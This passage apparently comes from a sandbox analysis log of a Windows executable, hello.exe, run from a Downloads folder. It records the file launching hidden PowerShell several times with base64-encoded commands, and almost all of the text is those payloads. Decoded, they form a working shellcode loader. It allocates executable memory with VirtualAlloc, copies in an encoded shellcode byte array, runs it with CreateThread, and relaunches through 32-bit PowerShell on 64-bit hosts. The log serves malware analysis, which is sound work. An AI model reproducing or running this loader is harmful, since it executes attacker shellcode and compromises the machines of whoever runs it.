ADAAeAA4ADAALAAwAHgANwBiACwAMAB4ADkANAAsADAAeABhADkALAAwAHgANABlACwAMAB4ADIAYwAsADAAeAAyADEALAAwAHgAMABmACwAMAB4ADUAMwAsADAAeABkADMALAAwAHgAZQA1ACwAMAB4ADEAYgAsADAAeABlAGIALAAwAHgAYQBiACwAMAB4ADgAMAAsADAAeABkAGMALAAwAHgAOQA4ACwAMAB4ADAANwAsADAAeAA4AGEALAAwAHgAMABjACwAMAB4AGUAYgAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGYAYwAsADAAeAA2ADcALAAwAHgAOAA3ACwAMAB4ADgANAAsADAAeABmAGQALAAwAHgAYQA0ACwAMAB4AGIAMgAsADAAeAAwAGMALAAwAHgAOAA5ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgAMAA1ACwAMAB4ADQANgAsADAAeAAwAGMALAAwAHgAMwA0ACwAMAB4AGUANQAsADAAeABhADYALAAwAHgAYwA0ACwAMAB4ADAANwAsADAAeABkADkALAAwAHgANgA4ACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANwA1ACwAMAB4ADYAYgAsADAAeAA3AGYALAAwAHgANABjACwAMAB4ADYANQAsADAAeAAxADkALAAwAHgAOABiACwAMAB4AGEAZgAsADAAeAAxADgALAAwAHgAMQBhACwAMAB4ADQAOAAsADAAeABkADIALAAwAHgAYwA2ACwAMAB4AGEAZgAsADAAeAA0AGYALAAwAHgANwA0ACwAMAB4ADgAYwAsADAAeAAwADgALAAwAHgAYgA0ACwAMAB4ADgANQAsADAAeAA0ADEALAAwAHgAYwBlACwAMAB4ADMAZgAsADAAeAA4ADkALAAwAHgAMgBlACwAMAB4ADgANAAsADAAeAAxADgALAAwAHgAOABkACwAMAB4AGIAMQAsADAAeAA0ADkALAAwAHgAMQAzACwAMAB4AGEAOQAsADAAeAAzAGEALAAwAHgANgBjACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgANwA4ACwAMAB4ADQAYgAsADAAeABkADAALAAwAHgANgAxACwAMAB4AGQAYQAsADAAeABmADIALAAwAHgANAAxACwAMAB4AGMAZgAsADAAeAA4AGQALAAwAHgAMABiACwAMAB4ADkAMQAsADAAeABiADcALAAwAHgANwAyACwAMAB4AGEAZQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4ADYANAAsADAAeABjAGUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAA4ADkALAAwAHgAOQAyACwAMAB4AGIANQAsADAAeAAzADYALAAwAHgAMQAzACwAMAB4ADUAOQAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4AGEAYwAsADAAeABjADgALAAwAHgAMgA4ACwAMAB4ADQANwAsADAAeAAwADcALAAwAHgANgAzACwAMAB4AGYAOQAsADAAeABlADAALAAwAHgAOAAxACwAMAB4ADcANAAsADAAeABmAGUALAAwAHgAZABiACwAMAB4AGYAZgAsADAAeABhADEALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABhAGMALAAwAHgAMAA2ACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABkAGUALAAwAHgAMwA5ACwAMAB4ADcAMgAsADAAeAAyAGEALAAwAHgANwAzACwAMAB4ADEANgAsADAAeABlADcALAAwAHgAZAA2ACwAMAB4ADIANwAsADAAeABjAGIALAAwAHgAOQBmACwAMAB4ADcANgAsADAAeABjAGYALAAwAHgAZQBiACwAMAB4ADUAZgAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4AGUAYgAsADAAeAA1AGYALAAwAHgANgBmACwAMAB4AGEAZQAsADAAeABhAGUALAAwAHgAMwBhACwAMAB4ADIAOQAsADAAeABkAGMALAAwAHgAMQBkACwAMAB4AGIAMgAsADAAeAA4ADEALAAwAHgAMgBjACwAMAB4ADAANQAsADAAeAA1ADAALAAwAHgAYgBkACwAMAB4ADcANAAsADAAeABlAGQALAAwAHgAZQA0ACwAMAB4ADcAMAAsADAAeABlADEALAAwAHgAMwBmACwAMAB4ADkAOAAsADAAeAAwADgALAAwAHgAYgBhACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeABhADUALAAwAHgAZQBmACwAMAB4ADMAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGUAZgAsADAAeABlAGIALAAwAHgAOQAwACwAMAB4ADcAZQAsADAAeAA3ADkALAAwAHgAOQA0ACwAMAB4AGEANwAsADAAeAA3AGYALAAwAHgAYQBjACwAMAB4ADIAMgAsADAAeABlADEALAAwAHgAMgBjACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAZABjACwAMAB4ADMAYQAsADAAeAAzADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgANgBiACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgANgA1ACwAMAB4ADcAZgAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADQAZQAsADAAeAA4ADAALAAwAHgAZQA3ACwAMAB4ADYAZQAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4ADUANwAsADAAeABlADcALAAwAHgAOQBhACwAMAB4AGIAYQAsADAAeAA2ADcALAAwAHgAZgA3ACwAMAB4ADEAMwAsADAAeAA1AGMALAAwAHgAMABkACwAMAB4AGYAMwAsADAAeAA3ADMALAAwAHgAZgA3ACwAMAB4AGMAZAAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4ADcAMgAsADAAeABiADQALAAwAHgAYwBmACwAMAB4ADUAZAAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGEAMwAsADAAeAAzADIALAAwAHgAMgBmACwAMAB4ADUAZAAsADAAeAAxADIALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeAA2ADcALAAwAHgAOAAyACwAMAB4ADYANwAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADMANwAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADIAYgAsADAAeAA1ADAALAAwAHgAZABmACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgAYQAwACwAMAB4AGIANwAsADAAeABjADEALAAwAHgAYQA0ACwAMAB4ADkANQAsADAAeABhADcALAAwAHgAMwA1ACwAMAB4ADkAMQAsADAAeAA5ADkALAAwAHgANQAyACwAMAB4ADAANwAsADAAeAA3ADIALAAwAHgAZAA2ACwAMAB4ADIAOQAsADAAeAAzADUALAAwAHgAZAA1ACwAMAB4AGUAOQAsADAAeAA4ADQALAAwAHgANQAwACwAMAB4ADkAYQAsADAAeAA3AGQALAAwAHgAMgA2ACwAMAB4AGIANQAsADAAeAAxAGEALAAwAHgANwBlACwAMAB4ADQAZQAsADAAeABiADUALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeAA4AGUALAAwAHgAZQA2ACwAMAB4ADcAMgAsADAAeABlADYALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAA2ADYALAAwAHgAZQA5ACwAMAB4AGUANwAsADAAeABjAGYALAAwAHgAMwBiACwAMAB4ADQANQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4AGUAYwAsADAAeAAwADEALAAwAHgAOQAwACwAMAB4AGYANwAsADAAeAAxADMALAAwAHgAZAAyACwAMAB4AGMAMwAsADAAeABhADEALAAwAHgANwBiACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAYwA0ACwAMAB4ADkAZQAsADAAeAAxAGIALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeAA5AGUALAAwAHgAOQAwACwAMAB4ADgAMwAsADAAeABkADYALAAwAHgAMQA4ACwAMAB4ADUAOAAsADAAeABkADgALAAwAHgANgBjACwAMAB4AGUANgAsADAAeAAyAGYALAAwAHgAMwBiACwAMAB4ADMANgAsADAAeAAyADQALAAwAHgAOQAwACwAMAB4ADIAYgAsADAAeABhAGUALAAwAHgANQA1ACwAMAB4AGQAMAAsADAAeAA1ADQALAAwAHgAMAAwACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAOAA0ACwAMAB4ADUAMgAsADAAeABkADUALAAwAHgANQA5ACwAMAB4AGYANgAsADAAeABhAGMALAAwAHgAMgAxACwAMAB4AGIANAAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4ADYAOQAsADAAeABjADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEoAYQBYAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAGEAWAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBhAFgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHoAbQApACkAOwAkAG4AeAA3AFYAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABHADYAQwBWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEcANgBDAFYAIAAkAG4AeAA3AFYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbgB4ADcAVgAgACQAZQAiADsAfQA=
  2⤵
  PID:7384

C:\Users\Admin\Downloads\hello.exe
"C:\Users\Admin\Downloads\hello.exe"
1⤵
- Executes dropped EXE
PID:9004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB0AHoAbQAgAD0AIAAnACQAWABOAEgAYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAE4ASABhACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAYgBlACwAMAB4ADIAOQAsADAAeABmAGMALAAwAHgAZAA0ACwAMAB4ADcANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAzAGMALAAwAHgAZgBiACwAMAB4ADEAZQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4ADYANAAsADAAeAAyAGYALAAwAHgAMgBiACwAMAB4ADMANAAsADAAeAA4ADEALAAwAHgAMgBiACwAMAB4ADQAMAAsADAAeAAxADUALAAwAHgANwBhACwAMAB4ADMAOAAsADAAeAAwADQALAAwAHgAOQA2ACwAMAB4AGYAMQAsADAAeAA2AGMALAAwAHgAYgBkACwAMAB4AGEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgANAAzACwAMAB4ADUAMQAsADAAeAA5ADEALAAwAHgAYwBlACwAMAB4ADgAYQAsADAAeABhADUALAAwAHgAZgBhACwAMAB4ADMAMwAsADAAeAA4AGMALAAwAHgANQA5ACwAMAB4ADAAMQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4ADYAMAAsADAAeABjAGEALAAwAHgANwA1ACwAMAB4ADYAZgAsADAAeABhADUALAAwAHgAOQBjACwAMAB4AGYAMAAsADAAeAA4ADAALAAwAHgANwBiACwAMAB4ADkANAAsADAAeABhADkALAAwAHgANABlACwAMAB4ADIAYwAsADAAeAAyADEALAAwAHgAMABmACwAMAB4ADUAMwAsADAAeABkADMALAAwAHgAZQA1ACwAMAB4ADEAYgAsADAAeABlAGIALAAwAHgAYQBiACwAMAB4ADgAMAAsADAAeABkAGMALAAwAHgAOQA4ACwAMAB4ADAANwAsADAAeAA4AGEALAAwAHgAMABjACwAMAB4AGUAYgAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGYAYwAsADAAeAA2ADcALAAwAHgAOAA3ACwAMAB4ADgANAAsADAAeABmAGQALAAwAHgAYQA0ACwAMAB4AGIAMgAsADAAeAAwAGMALAAwAHgAOAA5ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgAMAA1ACwAMAB4ADQANgAsADAAeAAwAGMALAAwAHgAMwA0ACwAMAB4AGUANQAsADAAeABhADYALAAwAHgAYwA0ACwAMAB4ADAANwAsADAAeABkADkALAAwAHgANgA4ACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANwA1ACwAMAB4ADYAYgAsADAAeAA3AGYALAAwAHgANABjACwAMAB4ADYANQAsADAAeAAxADkALAAwAHgAOABiACwAMAB4AGEAZgAsADAAeAAxADgALAAwAHgAMQBhACwAMAB4ADQAOAAsADAAeABkADIALAAwAHgAYwA2ACwAMAB4AGEAZgAsADAAeAA0AGYALAAwAHgANwA0ACwAMAB4ADgAYwAsADAAeAAwADgALAAwAHgAYgA0ACwAMAB4ADgANQAsADAAeAA0ADEALAAwAHgAYwBlACwAMAB4ADMAZgAsADAAeAA4ADkALAAwAHgAMgBlACwAMAB4ADgANAAsADAAeAAxADgALAAwAHgAOABkACwAMAB4AGIAMQAsADAAeAA0ADkALAAwAHgAMQAzACwAMAB4AGEAOQAsADAAeAAzAGEALAAwAHgANgBjACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgANwA4ACwAMAB4ADQAYgAsADAAeABkADAALAAwAHgANgAxACwAMAB4AGQAYQAsADAAeABmADIALAAwAHgANAAxACwAMAB4AGMAZgAsADAAeAA4AGQALAAwAHgAMABiACwAMAB4ADkAMQAsADAAeABiADcALAAwAHgANwAyACwAMAB4AGEAZQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4ADYANAAsADAAeABjAGUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAA4ADkALAAwAHgAOQAyACwAMAB4AGIANQAsADAAeAAzADYALAAwAHgAMQAzACwAMAB4ADUAOQAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4AGEAYwAsADAAeABjADgALAAwAHgAMgA4ACwAMAB4ADQANwAsADAAeAAwADcALAAwAHgANgAzACwAMAB4AGYAOQAsADAAeABlADAALAAwAHgAOAAxACwAMAB4ADcANAAsADAAeABmAGUALAAwAHgAZABiACwAMAB4AGYAZgAsADAAeABhADEALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABhAGMALAAwAHgAMAA2ACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABkAGUALAAwAHgAMwA5ACwAMAB4ADcAMgAsADAAeAAyAGEALAAwAHgANwAzACwAMAB4ADEANgAsADAAeABlADcALAAwAHgAZAA2ACwAMAB4ADIANwAsADAAeABjAGIALAAwAHgAOQBmACwAMAB4ADcANgAsADAAeABjAGYALAAwAHgAZQBiACwAMAB4ADUAZgAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4AGUAYgAsADAAeAA1AGYALAAwAHgANgBmACwAMAB4AGEAZQAsADAAeABhAGUALAAwAHgAMwBhACwAMAB4ADIAOQAsADAAeABkAGMALAAwAHgAMQBkACwAMAB4AGIAMgAsADAAeAA4ADEALAAwAHgAMgBjACwAMAB4ADAANQAsADAAeAA1ADAALAAwAHgAYgBkACwAMAB4ADcANAAsADAAeABlAGQALAAwAHgAZQA0ACwAMAB4ADcAMAAsADAAeABlADEALAAwAHgAMwBmACwAMAB4ADkAOAAsADAAeAAwADgALAAwAHgAYgBhACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeABhADUALAAwAHgAZQBmACwAMAB4ADMAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGUAZgAsADAAeABlAGIALAAwAHgAOQAwACwAMAB4ADcAZQAsADAAeAA3ADkALAAwAHgAOQA0ACwAMAB4AGEANwAsADAAeAA3AGYALAAwAHgAYQBjACwAMAB4ADIAMgAsADAAeABlADEALAAwAHgAMgBjACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAZABjACwAMAB4ADMAYQAsADAAeAAzADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgANgBiACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgANgA1ACwAMAB4ADcAZgAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADQAZQAsADAAeAA4ADAALAAwAHgAZQA3ACwAMAB4ADYAZQAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4ADUANwAsADAAeABlADcALAAwAHgAOQBhACwAMAB4AGIAYQAsADAAeAA2ADcALAAwAHgAZgA3ACwAMAB4ADEAMwAsADAAeAA1AGMALAAwAHgAMABkACwAMAB4AGYAMwAsADAAeAA3ADMALAAwAHgAZgA3ACwAMAB4AGMAZAAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4ADcAMgAsADAAeABiADQALAAwAHgAYwBmACwAMAB4ADUAZAAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGEAMwAsADAAeAAzADIALAAwAHgAMgBmACwAMAB4ADUAZAAsADAAeAAxADIALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeAA2ADcALAAwAHgAOAAyACwAMAB4ADYANwAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADMANwAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADIAYgAsADAAeAA1ADAALAAwAHgAZABmACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgAYQAwACwAMAB4AGIANwAsADAAeABjADEALAAwAHgAYQA0ACwAMAB4ADkANQAsADAAeABhADcALAAwAHgAMwA1ACwAMAB4ADkAMQAsADAAeAA5ADkALAAwAHgANQAyACwAMAB4ADAANwAsADAAeAA3ADIALAAwAHgAZAA2ACwAMAB4ADIAOQAsADAAeAAzADUALAAwAHgAZAA1ACwAMAB4AGUAOQAsADAAeAA4ADQALAAwAHgANQAwACwAMAB4ADkAYQAsADAAeAA3AGQALAAwAHgAMgA2ACwAMAB4AGIANQAsADAAeAAxAGEALAAwAHgANwBlACwAMAB4ADQAZQAsADAAeABiADUALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeAA4AGUALAAwAHgAZQA2ACwAMAB4ADcAMgAsADAAeABlADYALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAA2ADYALAAwAHgAZQA5ACwAMAB4AGUANwAsADAAeABjAGYALAAwAHgAMwBiACwAMAB4ADQANQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4AGUAYwAsADAAeAAwADEALAAwAHgAOQAwACwAMAB4AGYANwAsADAAeAAxADMALAAwAHgAZAAyACwAMAB4AGMAMwAsADAAeABhADEALAAwAHgANwBiACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAYwA0ACwAMAB4ADkAZQAsADAAeAAxAGIALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeAA5AGUALAAwAHgAOQAwACwAMAB4ADgAMwAsADAAeABkADYALAAwAHgAMQA4ACwAMAB4ADUAOAAsADAAeABkADgALAAwAHgANgBjACwAMAB4AGUANgAsADAAeAAyAGYALAAwAHgAMwBiACwAMAB4ADMANgAsADAAeAAyADQALAAwAHgAOQAwACwAMAB4ADIAYgAsADAAeABhAGUALAAwAHgANQA1ACwAMAB4AGQAMAAsADAAeAA1ADQALAAwAHgAMAAwACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAOAA0ACwAMAB4ADUAMgAsADAAeABkADUALAAwAHgANQA5ACwAMAB4AGYANgAsADAAeABhAGMALAAwAHgAMgAxACwAMAB4AGIANAAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4ADYAOQAsADAAeABjADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEoAYQBYAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAGEAWAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBhAFgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHoAbQApACkAOwAkAG4AeAA3AFYAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABHADYAQwBWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEcANgBDAFYAIAAkAG4AeAA3AFYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbgB4ADcAVgAgACQAZQAiADsAfQA=
  2⤵
  PID:8236

C:\Users\Admin\Downloads\hello.exe
"C:\Users\Admin\Downloads\hello.exe"
1⤵
- Executes dropped EXE
PID:5492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB0AHoAbQAgAD0AIAAnACQAWABOAEgAYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAE4ASABhACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAYgBlACwAMAB4ADIAOQAsADAAeABmAGMALAAwAHgAZAA0ACwAMAB4ADcANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4AD